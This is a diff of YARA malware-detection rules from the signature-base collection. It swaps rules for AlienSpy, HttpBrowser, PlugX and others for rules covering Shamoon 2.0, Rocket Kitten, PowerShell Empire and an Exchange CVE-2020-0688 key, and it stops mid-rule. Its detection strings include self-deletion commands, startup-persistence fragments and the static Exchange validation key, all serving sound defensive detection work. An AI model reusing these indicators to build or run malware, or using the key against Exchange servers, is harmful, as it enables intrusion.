+		description = "Detects Qakbot uninstaller used by the FBI / Dutch Police"
+		author = "Florian Roth"
+		id = "499bff56-ff49-53df-9922-227b816c0a36"
+		date = "2023-08-31"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_alienspy_rat.yar#L2-L50"
+		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_qakbot_uninstaller.yar#L16-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2b6fec104a89badb057619f648119dcf6debd294ee2b80a1fde6ffa30a7a45f7"
-		score = 75
+		logic_hash = "0ce963190502709edec9434e6a64cb9db7c5553113b686afc56a516350d76baa"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
-		reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
-		filetype = "Java"
-		hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
-		hash_2 = "818afea3040a887f191ee9d0579ac6ed"
-		hash_3 = "973de705f2f01e82c00db92eaa27912c"
-		hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
-		hash_5 = "071e12454731161d47a12a8c4b3adfea"
-		hash_6 = "a7d50760d49faff3656903c1130fd20b"
-		hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
-		hash_8 = "3698a3630f80a632c0c7c12e929184fb"
-		hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
+		tags = ""
+		hash1 = "559cae635f0d870652b9482ef436b31d4bb1a5a0f51750836f328d749291d0b6"
+		hash2 = "855eb5481f77dde5ad8fa6e9d953d4aebc280dddf9461144b16ed62817cc5071"
+		hash3 = "fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0"
 
 	strings:
-		$sa_1 = "META-INF/MANIFEST.MF"
-		$sa_2 = "Main.classPK"
-		$sa_3 = "plugins/Server.classPK"
-		$sa_4 = "IDPK"
-		$sb_1 = "config.iniPK"
-		$sb_2 = "password.iniPK"
-		$sb_3 = "plugins/Server.classPK"
-		$sb_4 = "LoadStub.classPK"
-		$sb_5 = "LoadStubDecrypted.classPK"
-		$sb_7 = "LoadPassword.classPK"
-		$sb_8 = "DecryptStub.classPK"
-		$sb_9 = "ClassLoaders.classPK"
-		$sc_1 = "config.xml"
-		$sc_2 = "options"
-		$sc_3 = "plugins"
-		$sc_5 = "util/OSHelper"
-		$sc_6 = "Start.class"
-		$sc_7 = "AlienSpy"
+		$op1 = { 69 c1 65 89 07 6c 03 c2 89 84 95 24 f6 ff ff 8b 55 e4 42 89 55 e4 81 fa 70 02 00 00 7c d4 }
+		$op2 = { 42 89 55 e4 81 fa 70 02 00 00 7c d4 f2 0f 10 0d a0 31 00 10 33 f6 f2 0f 10 15 a8 31 00 10 66 90 }
+		$op5 = { 68 48 31 00 10 6a 28 57 e8 e4 fd ff ff 8b 4d fc 83 c4 4c 33 cd 33 c0 }
+		$op6 = { 33 c0 66 39 06 74 0f 0f 1f 80 00 00 00 00 40 66 83 3c 46 00 75 f8 8d 3c 00 }
 
 	condition:
-		uint16( 0 ) == 0x4B50 and filesize < 800KB and ( ( all of ( $sa_* ) ) or ( all of ( $sb_* ) ) or ( all of ( $sc_* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Crime_Win64_Backdoor_Bazarbackdoor1 : FILE
+rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A1 : FILE
 {
 	meta:
-		description = "Detects BazarBackdoor injected 64-bit malware"
-		author = "@VK_Intel"
-		id = "1e387791-97fa-527d-87ed-68872b1891c4"
-		date = "2020-04-24"
+		description = "Detects suspicious sample with PowerShell content "
+		author = "Florian Roth (Nextron Systems)"
+		id = "1699f153-f972-5e06-a94b-eb95af637e6b"
+		date = "2017-07-27"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/pancak3lullz/status/1252303608747565057"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bazarbackdoor.yar#L1-L18"
+		reference = "PowerShell Empire Eval"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps_empire_eval.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "becb6ebc3a1be061b4f602cc188b172f59bfb6342605af68d8b38009d589f57e"
-		score = 75
+		logic_hash = "e77ff4e216601c62a049569a6ea1aae13fc2612b480f4d7fad4e99dc72155da3"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		tlp = "white"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4d10e80c7c80ef040efc680424a429558c7d76a965685bbc295908cb71137eba"
 
 	strings:
-		$str1 = "%id%"
-		$start = { 48 ?? ?? ?? ?? 57 48 83 ec 30 b9 01 00 00 00 e8 ?? ?? ?? ?? 84 c0 0f ?? ?? ?? ?? ?? 40 32 ff 40 ?? ?? ?? ?? e8 ?? ?? ?? ?? 8a d8 8b ?? ?? ?? ?? ?? 83 f9 01 0f ?? ?? ?? ?? ?? 85 c9 75 ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 85 c0 74 ?? b8 ff 00 00 00 e9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? eb ?? 40 b7 01 40 ?? ?? ?? ?? 8a cb e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 48 8b d8 48 ?? ?? ?? 74 ??}
-		$server = {40 53 48 83 ec 20 48 8b d9 e8 ?? ?? ?? ?? 85 c0 75 ?? 0f ?? ?? ?? ?? ?? ?? 66 83 f8 50 74 ?? b9 bb 01 00 00 66 3b c1 74 ?? a8 01 74 ?? 48 8b cb e8 ?? ?? ?? ?? 84 c0 75 ?? 48 8b cb e8 ?? ?? ?? ?? b8 f6 ff ff ff eb ?? 33 c0 48 83 c4 20 5b c3}
+		$s1 = "powershell" wide
+		$s2 = "pshcmd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_BKA_Goldenspy_Aug20_1 : FILE
+rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A2 : FILE
 {
 	meta:
-		description = "Detects variants of GoldenSpy Malware"
-		author = "BKA"
-		id = "4f47087e-6e68-53ff-9446-72a1751da359"
-		date = "2020-08-21"
+		description = "Detects suspicious sample with PowerShell content "
+		author = "Florian Roth (Nextron Systems)"
+		id = "8f299fcd-156c-5ce1-8582-c2a4ff2c0cfc"
+		date = "2017-07-27"
 		modified = "2023-12-05"
-		reference = "https://www.bka.de/SharedDocs/Kurzmeldungen/DE/Warnhinweise/200821_Cyberspionage.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_goldenspy.yar#L1-L19"
+		reference = "PowerShell Empire Eval"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps_empire_eval.yar#L27-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ba81a2b081842aaf06bbf623640a87946894df83fd0d7b7149c48afa8ed0a081"
-		score = 75
+		logic_hash = "28f320e721a61d7e2db39830652038eb4090429d73162888570a97b0bc1504d8"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e14c139159c23fdc18969afe57ec062e4d3c28dd42a20bed8ddde37ab4351a51"
 
 	strings:
-		$str01 = {c78510ffffff00000000 c78514ffffff0f000000 c68500ffffff00 c78528ffffff00000000 c7852cffffff0f000000 c68518ffffff00 c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 c645fc14 80bd04feffff00}
-		$str02 = "Ryeol HTTP Client Class" ascii
-		$str03 = "----RYEOL-FB3B405B7EAE495aB0C0295C54D4E096-" ascii
-		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\fwkp.exe" ascii
-		$str05 = "svmm" ascii
-		$str06 = "PROTOCOL_" ascii
-		$str07 = "softList" ascii
-		$str08 = "excuteExe" ascii
+		$x1 = "\\support\\Release\\ab.pdb" ascii
+		$s2 = "powershell.exe" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of ( $str* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen1 : FILE
+rule SIGNATURE_BASE_Shamoon2_Wiper : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		description = "Detects Shamoon 2.0 Wiper Component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e347024-ac5f-5e8c-a8b0-53eaa9a03979"
-		date = "2015-08-06"
+		id = "6660a64c-daa4-59e6-aa65-55194cac600c"
+		date = "2016-12-01"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L8-L48"
+		reference = "https://goo.gl/jKIfGB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon2.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "927821e974cff6cd4d15b19bf4d0486abc57725ecdf6f00755dd4f912fbf82d1"
+		logic_hash = "245b03d9606f2e391f53a60aa333c6b037aa1f013794d83b761813d54782b885"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907"
-		hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7"
-		hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9"
-		hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753"
-		hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b"
-		hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53"
-		hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc"
+		hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
+		hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
 
 	strings:
-		$x1 = "1001=cmd.exe" fullword ascii
-		$x2 = "1003=ShellExecuteA" fullword ascii
-		$x3 = "1002=/c del /q %s" fullword ascii
-		$x4 = "1004=SetThreadPriority" fullword ascii
-		$op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b }
-		$op1 = { e8 85 34 00 00 59 59 8b 86 b4 }
-		$op2 = { 8b 45 0c 83 38 00 0f 84 97 }
-		$op3 = { 8b 45 0c 83 38 00 0f 84 98 }
-		$op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d }
-		$op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 }
+		$a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
+		$x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
+		$s1 = "UFWYNYNTS" fullword wide
+		$s2 = "\\\\?\\ElRawDisk" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $x* ) and 1 of ( $op* )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Sample1 : FILE
+rule SIGNATURE_BASE_Shamoon2_Comcomp : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8babf47f-006c-5001-9753-08ac08f5e861"
-		date = "2015-08-06"
+		description = "Detects Shamoon 2.0 Communication Components"
+		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
+		id = "72068264-4f71-59fb-b3d8-938285ec8c7f"
+		date = "2016-12-01"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L50-L65"
+		reference = "https://goo.gl/jKIfGB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon2.yar#L30-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "746df577e952e0354342a48fe9f1650e63e3470902e7c5bba36d36fa34ea2bff"
-		score = 80
+		logic_hash = "edebdbcf17bd9fadc67c7d76839cf569f0ea20127d4e0d216411c35e9ba54208"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b"
-		hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
+		hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
 
 	strings:
-		$s0 = "update.hancominc.com" fullword wide
+		$s1 = "mkdir %s%s > nul 2>&1" fullword ascii
+		$s2 = "p[%s%s%d.%s" fullword ascii
+		$op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 }
+		$op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d }
+		$op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s0
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Sample2 : FILE
+rule SIGNATURE_BASE_Eldos_Rawdisk : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "693d381f-50b0-5f06-b725-78243b67092c"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L67-L84"
+		description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
+		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
+		id = "8a43f425-86b7-5a05-b7c3-13c78aa905f8"
+		date = "2016-12-01"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/jKIfGB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon2.yar#L50-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c7e945131a867bf46a467784d7119c95342733cc723cdeeb76d69c8fdb326749"
-		score = 80
+		logic_hash = "ab09371b91ab6889f342c7992108ad374b5ecf67b6c2144a6282670f177d0f15"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
+		hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
+		hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
 
 	strings:
-		$s0 = "nKERNEL32.DLL" fullword wide
-		$s1 = "WUSER32.DLL" fullword wide
-		$s2 = "mscoree.dll" fullword wide
-		$s3 = "VPDN_LU.exeUT" fullword ascii
+		$s1 = "g\\system32\\" wide
+		$s2 = "ztvttw" fullword wide
+		$s3 = "lwizvm" fullword ascii
+		$s4 = "FEJIKC" fullword ascii
+		$s5 = "INZQND" fullword ascii
+		$s6 = "IUTLOM" fullword wide
+		$s7 = "DKFKCK" fullword ascii
+		$op1 = { 94 35 77 73 03 40 eb e9 }
+		$op2 = { 80 7c 41 01 00 74 0a 3d }
+		$op3 = { 74 0a 3d 00 94 35 77 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them )
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Gen : FILE
+rule SIGNATURE_BASE_Rocketkitten_Keylogger : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic"
+		description = "Detects Keylogger used in Rocket Kitten APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0ba9facb-7385-56ce-9e20-d86261a39cd1"
-		date = "2015-08-06"
+		id = "558341db-a30d-586e-8efc-0fff1d8f94a1"
+		date = "2015-09-01"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L86-L124"
+		reference = "https://goo.gl/SjQhlp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rocketkitten_keylogger.yar#L8-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbc1dec88994427fc5003c9506f5a766531136ee80a16d00d2bf5bd5d7990cb3"
-		score = 90
+		logic_hash = "c8523a50075c6ee9675d37d870da55d9e6193bbc770f6b916e700ab9aad438cc"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27"
-		hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7"
-		hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684"
-		hash4 = "07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b"
-		hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d"
-		hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5"
-		hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
-		hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386"
-		hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b"
-		hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af"
-		hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113"
-		hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e"
-		hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669"
-		hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2"
-		hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16"
-		hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438"
-		hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d"
-		hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd"
-		hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48"
-		hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0"
-		hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81"
-		hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a"
+		super_rule = 1
+		hash1 = "1c9e519dca0468a87322bebe2a06741136de7969a4eb3efda0ab8db83f0807b4"
+		hash2 = "495a15f9f30d6f6096a97c2bd8cc5edd4d78569b8d541b1d5a64169f8109bc5b"
 
 	strings:
-		$s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide
-		$s1 = "HttpBrowser/1.0" fullword wide
-		$s2 = "set cmd : %s" ascii fullword
-		$s3 = "\\config.ini" wide fullword
+		$x1 = "\\Release\\CWoolger.pdb" ascii
+		$x2 = "WoolenLoger\\obj\\x86\\Release" ascii
+		$x3 = "D:\\Yaser Logers\\"
+		$z1 = "woolger" fullword wide
+		$s1 = "oShellLink.TargetPath = \"" fullword ascii
+		$s2 = "wscript.exe " fullword ascii
+		$s3 = "strSTUP = WshShell.SpecialFolders(\"Startup\")" fullword ascii
+		$s4 = "[CapsLock]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or ( $z1 and 2 of ( $s* ) ) ) ) or ( $z1 and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Plugx_Nvsmartmax_Gen : FILE
+rule SIGNATURE_BASE_VUL_Exchange_CVE_2020_0688 : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic"
+		description = "Detects static validation key used by Exchange server in web.config"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5ecd25a8-9717-527f-bb6e-3259b9a60458"
-		date = "2015-08-06"
+		id = "1065f297-0dc4-5dcb-b0f3-c89d06ff5e69"
+		date = "2020-02-26"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L126-L154"
+		reference = "https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2020_0688.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7795b0d978f9447a6cee808708d65992447e359539a8fe64331c06ad46ff7491"
-		score = 70
+		logic_hash = "035971028d36c8bbcc6a274817187adfbfefe530ff6808af5a7c0b4667c1bd8b"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef"
-		hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0"
-		hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5"
-		hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338"
-		hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e"
 
 	strings:
-		$s0 = "NvSmartMax.dll" fullword ascii
-		$s1 = "NvSmartMax.dll.url" fullword ascii
-		$s2 = "Nv.exe" fullword ascii
-		$s4 = "CryptProtectMemory failed" fullword ascii
-		$s5 = "CryptUnprotectMemory failed" fullword ascii
-		$s7 = "r%.*s(%d)%s" fullword wide
-		$s8 = " %s CRC " fullword wide
-		$op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 }
-		$op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 }
-		$op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 }
+		$h1 = "<?xml "
+		$x1 = "<machineKey validationKey=\"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\"" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of ( $s* ) and 1 of ( $op* )
+		filesize <= 300KB and $h1 at 0 and $x1
 }
-rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen2 : FILE
+rule SIGNATURE_BASE_Win32_Buzus_Softpulse : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		description = "Trojan Buzus / Softpulse"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd559642-a102-5946-8a7f-16c10e7f746d"
-		date = "2015-08-06"
+		id = "3b555916-030a-5773-b2f1-e995fc81b697"
+		date = "2015-05-13"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L156-L183"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_buzus_softpulse.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf274053fe7729471716a710e3bd5ed027d6ab2c45f7af9a1103bfa1ada9cbf4"
-		score = 70
+		hash = "2f6df200e63a86768471399a74180466d2e99ea9"
+		logic_hash = "49625594db57e9d629860970c20493b76e554addc2edb41adba64673a820a94b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
-		hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166"
 
 	strings:
-		$s1 = "navlu.dll.urlUT" fullword ascii
-		$s2 = "VPDN_LU.exeUT" fullword ascii
-		$s3 = "pnipcn.dllUT" fullword ascii
-		$s4 = "\\ssonsvr.exe" ascii
-		$s5 = "/c del /q %s" fullword ascii
-		$s6 = "\\setup.exe" ascii
-		$s7 = "msi.dllUT" fullword ascii
-		$op0 = { 8b 45 0c 83 38 00 0f 84 98 }
-		$op1 = { e8 dd 07 00 00 ff 35 d8 fb 40 00 8b 35 7c a0 40 }
-		$op2 = { 83 fb 08 75 2c 8b 0d f8 af 40 00 89 4d dc 8b 0d }
-		$op3 = { c7 43 18 8c 69 40 00 e9 da 01 00 00 83 7d f0 00 }
-		$op4 = { 6a 01 e9 7c f8 ff ff bf 1a 40 00 96 1b 40 00 01 }
+		$x1 = "pi4izd6vp0.com" fullword ascii
+		$s1 = "SELECT * FROM Win32_Process" fullword wide
+		$s4 = "CurrentVersion\\Uninstall\\avast" fullword wide
+		$s5 = "Find_RepeatProcess" fullword ascii
+		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" wide
+		$s7 = "myapp.exe" fullword ascii
+		$s14 = "/c ping -n 1 www.google" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of ( $s* ) and 1 of ( $op* )
+		uint16( 0 ) == 0x5a4d and ( ( $x1 and 2 of ( $s* ) ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Threatgroup3390_Strings : FILE
+rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_A : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT - Strings"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9a44393b-5220-5376-ba18-2330f4623cd6"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L185-L202"
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		id = "4cea1d45-b797-51b2-baa7-e66c8c0206ea"
+		date = "2014-11-23"
+		modified = "2024-04-24"
